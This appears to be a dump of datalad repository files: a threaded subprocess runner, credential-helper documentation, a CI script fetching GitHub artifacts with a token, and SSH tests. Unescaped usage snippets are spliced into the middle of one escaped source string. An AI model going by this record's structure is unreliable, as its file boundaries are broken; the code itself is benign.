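# `StdOutCapture` is importable from `datalad.runner.coreprotocols`, and
# `cat`/`echo` exist on the system.
from queue import Queue

from datalad.runner.coreprotocols import StdOutCapture
from datalad.runner.nonasyncrunner import run_command

# bytes: written to the subprocess, then its stdin is closed
res = run_command(['cat'], StdOutCapture, stdin=b'hello\n')
# res['stdout'] should now contain 'hello\n'

# Queue: elements are streamed to stdin until None is enqueued
q = Queue()
q.put(b'chunk 1\n')
q.put(b'chunk 2\n')
q.put(None)                      # signals end-of-input, closes stdin
res = run_command(['cat'], StdOutCapture, stdin=q)

# None: the subprocess gets no stdin at all
res = run_command(['echo', 'no input needed'], StdOutCapture, stdin=None)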
The caller is responsible for writing to it and closing\n it. If stdin is a bytes, it will be fed to stdin of the subprocess.\n If all data is written, stdin will be closed.\n If stdin is a Queue, all elements (bytes) put into the Queue will\n be passed to stdin until None is read from the queue. If None is\n read, stdin of the subprocess is closed.\n If stdin is None, nothing will be sent to stdin of the subprocess.\n More precisely, `subprocess.Popen` will be called with `stdin=None`.\n\n protocol_kwargs : dict, optional\n Passed to the protocol class constructor.\n\n timeout : float, optional\n If a non-`None` timeout is specified, the `timeout`-method of\n the protocol will be called if:\n\n - stdin-write, stdout-read, or stderr-read time out. In this case\n the file descriptor will be given as argument to the\n timeout-method. If the timeout-method return `True`, the file\n descriptor will be closed.\n\n - process.wait() timeout: if waiting for process completion after\n stdin, stderr, and stdout takes longer than `timeout` seconds,\n the timeout-method will be called with the argument `None`. If\n it returns `True`, the process will be terminated.\n\n exception_on_error : bool, optional\n This argument is only interpreted if the protocol is a subclass\n of `GeneratorMixIn`. If it is `True` (default), a\n `CommandErrorException` is raised by the generator if the\n sub process exited with a return code not equal to zero. If the\n parameter is `False`, no exception is raised. In both cases the\n return code can be read from the attribute `return_code` of\n the generator.\n\n popen_kwargs : dict, optional\n Passed to `subprocess.Popen`, will typically be parameters\n supported by `subprocess.Popen`. Note that `bufsize`, `stdin`,\n `stdout`, `stderr`, and `shell` will be overwritten internally.\n \"\"\"\n\n self.cmd = cmd\n self.protocol_class = protocol_class\n self.stdin = stdin\n self.protocol_kwargs = protocol_kwargs or {}\n self.timeout = timeout\n self.exception_on_error = exception_on_error\n self.popen_kwargs = popen_kwargs\n\n self.catch_stdout = self.protocol_class.proc_out\n self.catch_stderr = self.protocol_class.proc_err\n\n self.write_stdin: bool = False\n self.stdin_queue: Optional[Queue] = None\n self.process_stdin_fileno: Optional[int] = None\n self.process_stdout_fileno: Optional[int] = None\n self.process_stderr_fileno: Optional[int] = None\n self.stderr_enqueueing_thread: Optional[ReadThread] = None\n self.stdout_enqueueing_thread: Optional[ReadThread] = None\n self.stdin_enqueueing_thread: Optional[WriteThread] = None\n self.process_waiting_thread: Optional[WaitThread] = None\n\n self.process_running: bool = False\n self.output_queue: Queue = Queue()\n self.process_removed: bool = False\n self.generator: Optional[_ResultGenerator] = None\n self.process: Optional[Popen[Any]] = None\n self.return_code: Optional[int] = None\n\n self.last_touched: dict[Optional[int], float] = dict()\n self.active_file_numbers: set[Optional[int]] = set()\n self.stall_check_interval = 10\n\n self.initialization_lock = threading.Lock()\n self.generator_condition = threading.Condition()\n self.owning_thread: Optional[int] = None\n\n # Pure declarations\n self.protocol: WitlessProtocol\n self.fileno_mapping: dict[Optional[int], int]\n self.fileno_to_file: dict[Optional[int], Optional[IO]]\n self.file_to_fileno: dict[IO, int]\n self.result: dict\n\n def _check_result(self):\n if self.exception_on_error is True:\n if self.return_code not in (0, None):\n protocol = self.protocol\n decoded_output 
= {\n source: protocol.fd_infos[fileno][1].decode(protocol.encoding)\n for source, fileno in (\n (\"stdout\", protocol.stdout_fileno),\n (\"stderr\", protocol.stderr_fileno))\n if protocol.fd_infos[fileno][1] is not None\n }\n raise CommandError(\n cmd=self.cmd,\n code=self.return_code,\n stdout=decoded_output.get(\"stdout\", None),\n stderr=decoded_output.get(\"stderr\", None)\n )\n\n def run(self) -> dict | _ResultGenerator:\n \"\"\"\n Run the command as specified in __init__.\n\n This method is not re-entrant. Furthermore, if the protocol is a\n subclass of `GeneratorMixIn`, and the generator has not been\n exhausted, i.e. it has not raised `StopIteration`, this method should\n not be called again. If it is called again before the generator is\n exhausted, a `RuntimeError` is raised. In the non-generator case, a\n second caller will be suspended until the first caller has returned.\n\n Returns\n -------\n Any\n If the protocol is not a subclass of `GeneratorMixIn`, the\n result of protocol._prepare_result will be returned.\n\n Generator\n If the protocol is a subclass of `GeneratorMixIn`, a Generator\n will be returned. This allows to use this method in constructs\n like:\n\n for protocol_output in runner.run():\n ...\n\n Where the iterator yields whatever protocol.pipe_data_received\n sends into the generator.\n If all output was yielded and the process has terminated, the\n generator will raise StopIteration(return_code), where\n return_code is the return code of the process. The return code\n of the process will also be stored in the \"return_code\"-attribute\n of the runner. So you could write:\n\n gen = runner.run()\n for file_descriptor, data in gen:\n ...\n\n # get the return code of the process\n result = gen.return_code\n \"\"\"\n with self.initialization_lock:\n return self._locked_run()\n\n def _locked_run(self) -> dict | _ResultGenerator:\n with self.generator_condition:\n if self.generator is not None:\n if self.owning_thread == threading.get_ident():\n raise RuntimeError(\n \"ThreadedRunner.run() was re-entered by already owning \"\n f\"thread {threading.get_ident()}. The execution is \"\n f\"still owned by thread {self.owning_thread}\"\n )\n self.generator_condition.wait()\n assert self.generator is None\n\n if isinstance(self.stdin, (int, IO, type(None))):\n # We will not write anything to stdin. If the caller passed a\n # file-like he can write to it from a different thread.\n self.write_stdin = False\n\n elif isinstance(self.stdin, bytes):\n # Establish a queue to write to the process and\n # enqueue the input that is already provided.\n self.write_stdin = True\n self.stdin_queue = Queue()\n self.stdin_queue.put(self.stdin)\n self.stdin_queue.put(None)\n\n elif isinstance(self.stdin, Queue):\n # Establish a queue to write to the process.\n self.write_stdin = True\n self.stdin_queue = self.stdin\n\n else:\n # We do not recognize the input class will and just pass is through\n # to Popen(). We assume that the caller handles any writing if\n # desired.\n self.write_stdin = False\n\n self.protocol = self.protocol_class(**self.protocol_kwargs)\n\n # The following command is generated internally by datalad\n # and trusted. 
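# Illustrative sketch of the generator-style result handling documented in
# run() above. Combining GeneratorMixIn with an output-capturing protocol
# mirrors what the docstring describes; `StdOutCapture` from
# `datalad.runner.coreprotocols` is an assumption not shown in this file.
from datalad.runner.coreprotocols import StdOutCapture
from datalad.runner.nonasyncrunner import run_command
from datalad.runner.protocol import GeneratorMixIn


class StdOutCaptureGenerator(GeneratorMixIn, StdOutCapture):
    """Yield stdout chunks as they arrive instead of buffering them"""
    def __init__(self):
        GeneratorMixIn.__init__(self)
        StdOutCapture.__init__(self)

    def pipe_data_received(self, fd, data):
        if fd == 1:                   # stdout
            self.send_result(data)    # hand the chunk to the generator


gen = run_command(['ls', '-l'], StdOutCaptureGenerator, stdin=None)
for chunk in gen:
    print(chunk.decode(), end='')
# after exhaustion the exit status is available on the generator
print('exit code:', gen.return_code)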
Security check is therefore skipped.\n kwargs = {\n **self.popen_kwargs,\n **dict(\n bufsize=0,\n stdin=subprocess.PIPE if self.write_stdin else self.stdin,\n stdout=subprocess.PIPE if self.catch_stdout else None,\n stderr=subprocess.PIPE if self.catch_stderr else None,\n shell=True if isinstance(self.cmd, str) else False # nosec\n )\n }\n\n if self.process is not None:\n raise RuntimeError(f\"Process already running {self.process.pid}\")\n\n self.return_code = None\n try:\n # The following command is generated internally by datalad\n # and trusted. Security check is therefore skipped.\n self.process = Popen(self.cmd, **kwargs) # nosec\n\n except OSError as e:\n if not on_windows and \"argument list too long\" in str(e).lower():\n lgr.error(\n \"Caught exception suggesting too large stack size limits. \"\n \"Hint: use 'ulimit -s' command to see current limit and \"\n \"e.g. 'ulimit -s 8192' to reduce it to avoid this \"\n \"exception. See \"\n \"https://github.com/datalad/datalad/issues/6106 for more \"\n \"information.\"\n )\n raise\n\n self.process_running = True\n self.active_file_numbers.add(None)\n\n self.process_stdin_fileno = _get_fileno(self.write_stdin, self.process.stdin)\n self.process_stdout_fileno = _get_fileno(self.catch_stdout, self.process.stdout)\n self.process_stderr_fileno = _get_fileno(self.catch_stderr, self.process.stderr)\n\n # We pass process as transport-argument. It does not have the same\n # semantics as the asyncio-signature, but since it is only used in\n # WitlessProtocol, all necessary changes can be made there.\n self.protocol.connection_made(self.process)\n\n # Map the pipe file numbers to stdout and stderr file number, because\n # the latter are hardcoded in the protocol code\n self.fileno_mapping = {\n self.process_stdout_fileno: STDOUT_FILENO,\n self.process_stderr_fileno: STDERR_FILENO,\n self.process_stdin_fileno: STDIN_FILENO,\n }\n if None in self.fileno_mapping:\n self.fileno_mapping.pop(None)\n\n self.fileno_to_file = {\n self.process_stdout_fileno: self.process.stdout,\n self.process_stderr_fileno: self.process.stderr,\n self.process_stdin_fileno: self.process.stdin\n }\n if None in self.fileno_to_file:\n self.fileno_to_file.pop(None)\n\n self.file_to_fileno = {\n f: f.fileno()\n for f in (\n self.process.stdout,\n self.process.stderr,\n self.process.stdin\n ) if f is not None\n }\n\n current_time = time.time()\n if self.timeout:\n self.last_touched[None] = current_time\n\n cmd_string = self.cmd if isinstance(self.cmd, str) else \" \".join(self.cmd)\n if self.catch_stderr:\n if self.timeout:\n self.last_touched[self.process_stderr_fileno] = current_time\n self.active_file_numbers.add(self.process_stderr_fileno)\n self.last_touched[self.process_stderr_fileno] = current_time\n assert self.process.stderr is not None\n self.stderr_enqueueing_thread = ReadThread(\n identifier=\"STDERR: \" + cmd_string[:20],\n signal_queues=[self.output_queue],\n user_info=self.process_stderr_fileno,\n source=self.process.stderr,\n destination_queue=self.output_queue)\n self.stderr_enqueueing_thread.start()\n\n if self.catch_stdout:\n if self.timeout:\n self.last_touched[self.process_stdout_fileno] = current_time\n self.active_file_numbers.add(self.process_stdout_fileno)\n self.last_touched[self.process_stdout_fileno] = current_time\n assert self.process.stdout is not None\n self.stdout_enqueueing_thread = ReadThread(\n identifier=\"STDOUT: \" + cmd_string[:20],\n signal_queues=[self.output_queue],\n user_info=self.process_stdout_fileno,\n source=self.process.stdout,\n 
destination_queue=self.output_queue)\n self.stdout_enqueueing_thread.start()\n\n if self.write_stdin:\n # No timeouts for stdin\n self.active_file_numbers.add(self.process_stdin_fileno)\n assert self.stdin_queue is not None\n assert self.process.stdin is not None\n self.stdin_enqueueing_thread = WriteThread(\n identifier=\"STDIN: \" + cmd_string[:20],\n user_info=self.process_stdin_fileno,\n signal_queues=[self.output_queue],\n source_queue=self.stdin_queue,\n destination=self.process.stdin)\n self.stdin_enqueueing_thread.start()\n\n self.process_waiting_thread = WaitThread(\n \"process_waiter\",\n [self.output_queue],\n self.process)\n self.process_waiting_thread.start()\n\n if isinstance(self.protocol, GeneratorMixIn):\n self.generator = _ResultGenerator(\n self,\n self.protocol.result_queue\n )\n self.owning_thread = threading.get_ident()\n return self.generator\n\n return self.process_loop()\n\n def process_loop(self) -> dict:\n # Process internal messages until no more active file descriptors\n # are present. This works because active file numbers are only\n # removed when an EOF is received in `self.process_queue`.\n while self.should_continue():\n self.process_queue()\n\n # Let the protocol prepare the result. This has to be done after\n # the loop was left to ensure that all data from stdout and stderr\n # is processed.\n self.result = self.protocol._prepare_result()\n self.protocol.process_exited()\n\n # Ensure that all communication channels are closed.\n self.ensure_stdin_stdout_stderr_closed()\n self.protocol.connection_lost(None) # TODO: check exception\n self.wait_for_threads()\n self._set_process_exited()\n return self.result\n\n def _handle_file_timeout(self, source):\n if self.protocol.timeout(self.fileno_mapping[source]) is True:\n self.remove_file_number(source)\n\n def _handle_process_timeout(self):\n if self.protocol.timeout(None) is True:\n self.ensure_stdin_stdout_stderr_closed()\n self.process.terminate()\n self.process.wait()\n self.remove_process()\n\n def _handle_source_timeout(self, source):\n if source is None:\n self._handle_process_timeout()\n else:\n self._handle_file_timeout(source)\n\n def _update_timeouts(self) -> bool:\n last_touched = list(self.last_touched.items())\n new_times = dict()\n current_time = time.time()\n timeout_occurred = False\n for source, last_time in last_touched:\n if self.timeout is not None and current_time - last_time >= self.timeout:\n new_times[source] = current_time\n self._handle_source_timeout(source)\n timeout_occurred = True\n self.last_touched = {\n **self.last_touched,\n **new_times}\n return timeout_occurred\n\n def process_timeouts(self) -> bool:\n \"\"\"Check for timeouts\n\n This method checks whether a timeout occurred since\n it was called last. 
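# Illustrative sketch of the timeout machinery documented for the `timeout`
# parameter above: a protocol may override timeout() and decide whether the
# stalled file descriptor (or, for None, the whole process) is closed or
# terminated. `StdOutCapture` from `datalad.runner.coreprotocols` and the
# availability of `sleep` are assumptions not shown in this file.
from datalad.runner.coreprotocols import StdOutCapture
from datalad.runner.nonasyncrunner import ThreadedRunner


class ImpatientProtocol(StdOutCapture):
    def timeout(self, fd):
        # fd is None for a process-wait timeout, otherwise the mapped
        # stdin/stdout/stderr file number that stalled
        return True   # True -> close the fd / terminate the process


runner = ThreadedRunner(
    cmd=['sleep', '60'],
    protocol_class=ImpatientProtocol,
    stdin=None,
    timeout=2.0,
)
result = runner.run()   # returns once the stalled process was terminated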
If a timeout occurred, the timeout\n handler is called.\n\n Returns: bool\n Return `True` if at least one timeout occurred,\n `False` if no timeout occurred.\n \"\"\"\n if self.timeout is not None:\n return self._update_timeouts()\n return False\n\n def should_continue(self) -> bool:\n # Continue with queue processing if there is still a process or\n # monitored files, or if there are still elements in the output queue.\n return (\n len(self.active_file_numbers) > 0\n or not self.output_queue.empty()\n ) and not self.is_stalled()\n\n def is_stalled(self) -> bool:\n # If all queue-filling threads have exited and the queue is empty, we\n # might have a stall condition.\n live_threads = [\n thread.is_alive()\n for thread in (\n self.stdout_enqueueing_thread,\n self.stderr_enqueueing_thread,\n self.process_waiting_thread,\n ) if thread is not None]\n return not any(live_threads) and self.output_queue.empty()\n\n def check_for_stall(self) -> bool:\n if self.stall_check_interval == 0:\n self.stall_check_interval = 11\n if self.is_stalled():\n lgr.warning(\n \"ThreadedRunner.process_queue(): stall detected\")\n return True\n self.stall_check_interval -= 1\n return False\n\n def _set_process_exited(self):\n self.return_code = self.process.poll()\n self.process = None\n self.process_running = False\n\n def process_queue(self):\n \"\"\"\n Get a single event from the queue or handle a timeout. This method\n might modify the set of active file numbers if a file-closed event\n is read from the output queue, or if a timeout-callback return True.\n \"\"\"\n data = None\n while True:\n # We do not need a user provided timeout here. If\n # self.timeout is None, no timeouts are reported anyway.\n # If self.timeout is not None, and any enqueuing (stdin)\n # or de-queuing (stdout, stderr) operation takes longer than\n # self.timeout, we will get a queue entry for that.\n # We still use a \"system\"-timeout, i.e.\n # `ThreadedRunner.process_check_interval`, to check whether the\n # process is still running.\n try:\n file_number, state, data = self.output_queue.get(\n timeout=ThreadedRunner.timeout_resolution)\n break\n except Empty:\n if self.check_for_stall() is True:\n return\n if self.process_timeouts():\n return\n continue\n\n if state == IOState.process_exit:\n self.remove_process()\n return\n\n if self.write_stdin and file_number == self.process_stdin_fileno:\n # The only data-signal we expect from stdin thread\n # is None, indicating that the thread ended\n assert data is None\n self.remove_file_number(self.process_stdin_fileno)\n\n elif self.catch_stderr or self.catch_stdout:\n if data is None:\n # Received an EOF for stdout or stderr.\n self.remove_file_number(file_number)\n else:\n # Call the protocol handler for data\n assert isinstance(data, bytes)\n self.last_touched[file_number] = time.time()\n self.protocol.pipe_data_received(\n self.fileno_mapping[file_number],\n data)\n\n def remove_process(self):\n if None not in self.active_file_numbers:\n # Might already be removed due to a timeout callback returning\n # True and subsequent removal of the process.\n return\n self.active_file_numbers.remove(None)\n if self.timeout:\n del self.last_touched[None]\n\n # Remove stdin from the active set because the process will\n # no longer consume input from stdin. 
This is done by enqueuing\n # None to the stdin queue.\n if self.write_stdin:\n self.stdin_queue.put(None)\n\n self.return_code = self.process.poll()\n\n def remove_file_number(self, file_number: int):\n \"\"\"\n Remove a file number from the active set and from\n the timeout set.\n \"\"\"\n\n # TODO: check exception\n # Let the protocol know that the connection was lost.\n self.protocol.pipe_connection_lost(\n self.fileno_mapping[file_number],\n None)\n\n if file_number in self.active_file_numbers:\n # Remove the file number from the set of active numbers.\n self.active_file_numbers.remove(file_number)\n\n # If we are checking timeouts, remove the file number from\n # timeouts.\n if self.timeout and file_number in self.last_touched:\n del self.last_touched[file_number]\n\n _try_close(self.fileno_to_file[file_number])\n\n def close_stdin(self):\n if self.stdin_queue:\n self.stdin_queue.put(None)\n\n def _ensure_closed(self, file_objects):\n for file_object in file_objects:\n if file_object is not None:\n file_number = self.file_to_fileno.get(file_object, None)\n if file_number is not None:\n if self.timeout and file_number in self.last_touched:\n del self.last_touched[file_number]\n if file_number in self.active_file_numbers:\n self.active_file_numbers.remove(file_number)\n _try_close(file_object)\n\n def ensure_stdin_stdout_stderr_closed(self):\n self.close_stdin()\n self._ensure_closed(\n (\n self.process.stdin,\n self.process.stdout,\n self.process.stderr\n )\n )\n\n def ensure_stdout_stderr_closed(self):\n self._ensure_closed((self.process.stdout, self.process.stderr))\n\n def wait_for_threads(self):\n for thread in (self.stderr_enqueueing_thread,\n self.stdout_enqueueing_thread,\n self.stdin_enqueueing_thread):\n if thread is not None:\n thread.request_exit()\n\n\ndef run_command(cmd: str | list,\n protocol: type[WitlessProtocol],\n stdin: int | IO | bytes | Queue[Optional[bytes]] | None,\n protocol_kwargs: Optional[dict] = None,\n timeout: Optional[float] = None,\n exception_on_error: bool = True,\n **popen_kwargs) -> dict | _ResultGenerator:\n \"\"\"\n Run a command in a subprocess\n\n this function delegates the execution to an instance of\n `ThreadedRunner`, please see `ThreadedRunner.__init__()` for a\n documentation of the parameters, and `ThreadedRunner.run()` for a\n documentation of the return values.\n \"\"\"\n runner = ThreadedRunner(\n cmd=cmd,\n protocol_class=protocol,\n stdin=stdin,\n protocol_kwargs=protocol_kwargs,\n timeout=timeout,\n exception_on_error=exception_on_error,\n **popen_kwargs,\n )\n\n return runner.run()\n" }, { "alpha_fraction": 0.7646908164024353, "alphanum_fraction": 0.7646908164024353, "avg_line_length": 68.58928680419922, "blob_id": "9bb32a55ba9d82bf57a6fb831652c554ffbb6c06", "content_id": "2c3ba032338b2c9c967e84084fa9dd6fc35ff63d", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3897, "license_type": "permissive", "max_line_length": 369, "num_lines": 56, "path": "/docs/source/credentials.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "Credentials\n***********\n\nIntegration with Git\n====================\n\nGit and DataLad can use each other's credential system.\nBoth directions are independent of each other and none is necessarily required.\nEither direction can be configured based on URL matching patterns.\nIn addition, Git can be configured to always query DataLad for credentials without any URL matching.\n\nLet Git query 
DataLad\n=====================\n\nIn order to allow Git to query credentials from DataLad, Git needs to be configured to use the git credential helper delivered with DataLad (an executable called `git-credential-datalad`).\nThat is, a section like this needs to be part of one's git config file::\n\n [credential \"https://*.data.example.com\"]\n helper = \"datalad\"\n\nNote:\n\n- This most likely only makes sense at the user or system level (options `--global`|`--system` with `git config`), since cloning of a repository needs the credentials before there is a local repository.\n- The name of that section is a URL matching expression - see `man gitcredentials`.\n- The URL matching does NOT include the scheme! Hence, if you need to match `http` as well as `https`, you need two such entries.\n- Multiple git credential helpers can be configured - Git will ask them one after another until it got a username and a password for the URL in question. For example on macOS, Git comes with a helper to use the system's keychain and Git is configured system-wide to query `git-credential-osxkeychain`. This does not conflict with setting up DataLad's credential helper.\n- The example configuration requires `git-credential-datalad` to be in the path in order for Git to find it. Alternatively, the value of the `helper` entry needs to be the absolute path of `git-credential-datalad`.\n- In order to make Git always consider DataLad as a credential source, one can simply not specify any URL pattern (so it's `[credential]` instead of `[credential \"SOME-PATTERN\"]`)\n\nLet DataLad query Git\n=====================\n\nThe other way around, DataLad can ask Git for credentials (which it will acquire via other git credential helpers).\nTo do so, a DataLad provider config needs to be set up::\n\n [provider:data_example_provider]\n url_re = https://.*data\\.example\\.com\n authentication_type = http_basic_auth\n credential = data_example_cred\n [credential:data_example_cred]\n type = git\n\nNote:\n\n- Such a config lives in a dedicated file named after the provider name (e.g. all of the above example would be the content of :file:`data_example_provider.cfg`, matching `[provider:data_example_provider]`).\n- Valid locations for these files are listed in :ref:`chap_design_credentials`.\n- In opposition to Git's approach, `url_re` is a regular expression that matches the entire URL including the scheme.\n- The above is particularly important in case of redirects, as DataLad currently matches the URL it was given instead of the one it ultimately uses the credentials with.\n- The name of the credential section must match the credential entry in the provider section (e.g. 
`[credential:data_example_cred]` and `credential = data_example_cred` in the above example).\n\nDataLad will prompt the user to create a provider configuration and respective credentials when it first encounters a URL that requires authentication but no matching credentials are found.\nThis behavior extends to the credential helper and may therefore be triggered by a `git clone` if Git is configured to use `git-credential-datalad`.\nHowever, interactivity of `git-credential-datalad` can be turned off (see `git-credential-datalad -h`)\n\nIt is possible to end up in a situation where Git would query DataLad and vice versa for the same URL, especially if Git is configured to query DataLad unconditionally.\n`git-credential-datalad` will discover this circular setup and stop it by simply ignoring DataLad's provider configuration that points back to Git.\n" }, { "alpha_fraction": 0.6763401627540588, "alphanum_fraction": 0.6803708076477051, "avg_line_length": 38.380950927734375, "blob_id": "d7f472baba5a1f5d11e75875769f6884c1f37ced", "content_id": "ca94e81f7c0e34412b679df9f6a78dd6d20373df", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2481, "license_type": "permissive", "max_line_length": 196, "num_lines": 63, "path": "/tools/ci/download-latest-artifact", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n# Based on https://raw.githubusercontent.com/RedHatInsights/policies-ui-frontend/master/.github/scripts/download-latest-openapi.sh\n# Apache 2.0 license \nset -eu\n\n: \"${TARGET_REPO:=datalad/datalad-extensions}\"\n: \"${TARGET_BRANCH:=master}\"\n: \"${TARGET_WORKFLOW:=build-git-annex.yaml}\"\n: \"${TARGET_PATH:=download}\" # Directory which will be created if doesn't exist\n: \"${TARGET_ARTIFACT:=git-annex-debianstandalone-packages}\"\n: \"${GITHUB_TOKEN:=}\" # will be taken from git config hub.oauthtoken or needs to be defined\n\n: \"${CURL:=curl --silent}\"\n\n: \"${JOBS_DOWNLOAD:=$(mktemp -u)}\"\n\nfunction definedOrExit {\n if [[ -z \"$1\" ]]; then\n echo \"$2\"\n cat \"$3\"\n exit 1\n fi\n}\n\nif [ -z \"$GITHUB_TOKEN\" ]; then\n if git config hub.oauthtoken >/dev/null; then\n GITHUB_TOKEN=$(git config hub.oauthtoken)\n else\n echo \"E: no GITHUB_TOKEN was specified and no hub.oauthtoken is in git config\" >&2\n exit 1\n fi\nfi\n\necho \"Using curl as \\\"${CURL}\\\"\"\n\nfunction call_curl {\n ${CURL} -H \"Authorization: Bearer ${GITHUB_TOKEN}\" \"$@\"\n}\n\nJOBS_URL=\"https://api.github.com/repos/${TARGET_REPO}/actions/workflows/${TARGET_WORKFLOW}/runs?status=success&branch=${TARGET_BRANCH}\"\n\necho \"Getting artifacts_url from ${JOBS_URL} into '${JOBS_DOWNLOAD}'\"\ncall_curl \"${JOBS_URL}\" >| \"${JOBS_DOWNLOAD}\"\nARTIFACTS_URL=$(jq --raw-output '.workflow_runs[0].artifacts_url | if . == null then \"\" else . end' < \"${JOBS_DOWNLOAD}\")\ndefinedOrExit \"${ARTIFACTS_URL}\" \"Unable to get artifacts_url\" \"${JOBS_DOWNLOAD}\"\n\necho \"Getting archive download url from ${ARTIFACTS_URL}\"\ncall_curl \"${ARTIFACTS_URL}\" >| \"${JOBS_DOWNLOAD}\"\nARCHIVE_DOWNLOAD_URL=$(jq --raw-output --arg artifact \"$TARGET_ARTIFACT\" '[.artifacts | select(.name == $artifact)][0].archive_download_url | if . == null then \"\" else . 
end' < \"${JOBS_DOWNLOAD}\")\ndefinedOrExit \"${ARCHIVE_DOWNLOAD_URL}\" \"Unable to get archive_download_url\" \"${JOBS_DOWNLOAD}\"\n\ncall_curl -i \"${ARCHIVE_DOWNLOAD_URL}\" >| \"${JOBS_DOWNLOAD}\"\necho \"Getting download url from ${ARCHIVE_DOWNLOAD_URL}\"\nDOWNLOAD_URL=$(grep -ioP 'Location: \\K.+' < \"${JOBS_DOWNLOAD}\")\ndefinedOrExit \"${DOWNLOAD_URL}\" \"Unable to get Location header with download url\" \"${JOBS_DOWNLOAD}\"\nDOWNLOAD_URL=${DOWNLOAD_URL%$'\\r'}\nrm -f \"${JOBS_DOWNLOAD}\"\n\necho \"Downloading artifact package from ${DOWNLOAD_URL}\"\nmkdir -p \"${TARGET_PATH}\"\ncall_curl \"${DOWNLOAD_URL}\" >| ${TARGET_PATH}/.artifact.zip\n( cd \"${TARGET_PATH}\" && unzip .artifact.zip; )\nrm ${TARGET_PATH}/.artifact.zip\n" }, { "alpha_fraction": 0.5979161262512207, "alphanum_fraction": 0.605129599571228, "avg_line_length": 31.547826766967773, "blob_id": "e22e6a15ba40e73d9aa2e771bf530bf664b87989", "content_id": "e06c3894c6e79f5abce0d0fcb3d478271abe3771", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3743, "license_type": "permissive", "max_line_length": 87, "num_lines": 115, "path": "/datalad/support/tests/test_sshrun.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport sys\nfrom io import StringIO, UnsupportedOperation\n\nimport pytest\nfrom unittest.mock import patch\n\n\nfrom datalad.api import sshrun\nfrom datalad.cli.main import main\nfrom datalad.cmd import (\n StdOutCapture,\n WitlessRunner,\n)\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_equal,\n assert_raises,\n skip_if_on_windows,\n skip_ssh,\n swallow_outputs,\n with_tempfile,\n)\n\n\[email protected](reason=\"under pytest for some reason gets 1 not 42\")\n@skip_if_on_windows\n@skip_ssh\ndef test_exit_code():\n # will relay actual exit code on CommandError\n cmd = ['datalad', 'sshrun', 'datalad-test', 'exit 42']\n with assert_raises(SystemExit) as cme:\n # running nosetests without -s\n if isinstance(sys.stdout, StringIO): # pragma: no cover\n with swallow_outputs(): # need to give smth with .fileno ;)\n main(cmd)\n else:\n # to test both scenarios\n main(cmd)\n assert_equal(cme.value.code, 42)\n\n\n@skip_if_on_windows\n@skip_ssh\n@with_tempfile(content=\"123magic\")\ndef test_no_stdin_swallow(fname=None):\n # will relay actual exit code on CommandError\n cmd = ['datalad', 'sshrun', 'datalad-test', 'cat']\n\n out = WitlessRunner().run(\n cmd, stdin=open(fname), protocol=StdOutCapture)\n assert_equal(out['stdout'].rstrip(), '123magic')\n\n # test with -n switch now, which we could place even at the end\n out = WitlessRunner().run(\n cmd + ['-n'], stdin=open(fname), protocol=StdOutCapture)\n assert_equal(out['stdout'], '')\n\n\n@skip_if_on_windows\n@skip_ssh\n@with_tempfile(suffix=\"1 space\", content=\"magic\")\ndef test_fancy_quotes(f=None):\n cmd = ['datalad', 'sshrun', 'datalad-test', \"\"\"'cat '\"'\"'%s'\"'\"''\"\"\" % f]\n out = WitlessRunner().run(cmd, protocol=StdOutCapture)\n assert_equal(out['stdout'], 'magic')\n\n\n@skip_if_on_windows\n@skip_ssh\ndef test_ssh_option():\n # This test is hacky in that 
detecting the sent value depends on systems\n # commonly configuring `AcceptEnv LC_*` in their sshd_config. If we get\n # back an empty value, assume that isn't configured, and skip the test.\n with patch.dict('os.environ', {\"LC_DATALAD_HACK\": 'hackbert'}):\n with swallow_outputs() as cmo:\n with assert_raises(SystemExit):\n main([\"datalad\", \"sshrun\", \"-oSendEnv=LC_DATALAD_HACK\",\n \"datalad-test\", \"echo $LC_DATALAD_HACK\"])\n out = cmo.out.strip()\n if not out:\n raise SkipTest(\n \"SSH target probably does not accept LC_* variables. \"\n \"Skipping\")\n assert_equal(out, \"hackbert\")\n\n\n@skip_if_on_windows\n@skip_ssh\ndef test_ssh_ipv4_6_incompatible():\n with assert_raises(SystemExit):\n main([\"datalad\", \"sshrun\", \"-4\", \"-6\", \"datalad-test\", \"true\"])\n\n\n@skip_if_on_windows\n@skip_ssh\ndef test_ssh_ipv4_6():\n # This should fail with a RuntimeError if a version is not supported (we're\n # not bothering to check what datalad-test supports), but if the processing\n # fails, it should be something else.\n for kwds in [{\"ipv4\": True}, {\"ipv6\": True}]:\n try:\n sshrun(\"datalad-test\", \"true\", **kwds)\n except RuntimeError:\n pass\n except UnsupportedOperation as exc:\n pytest.skip(f\"stdin is swallowed by pytest: {exc}\")\n" }, { "alpha_fraction": 0.5772558450698853, "alphanum_fraction": 0.5920889973640442, "avg_line_length": 30.115385055541992, "blob_id": "bd8f4abbed2932da1ab163dc0967acaca1d95158", "content_id": "9721c60bfc45dd9a34d45862b112efcbc7ae8f2e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1618, "license_type": "permissive", "max_line_length": 87, "num_lines": 52, "path": "/datalad/interface/tests/test_results.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Result utility tests\n\n\"\"\"\n\nfrom datalad.distribution.dataset 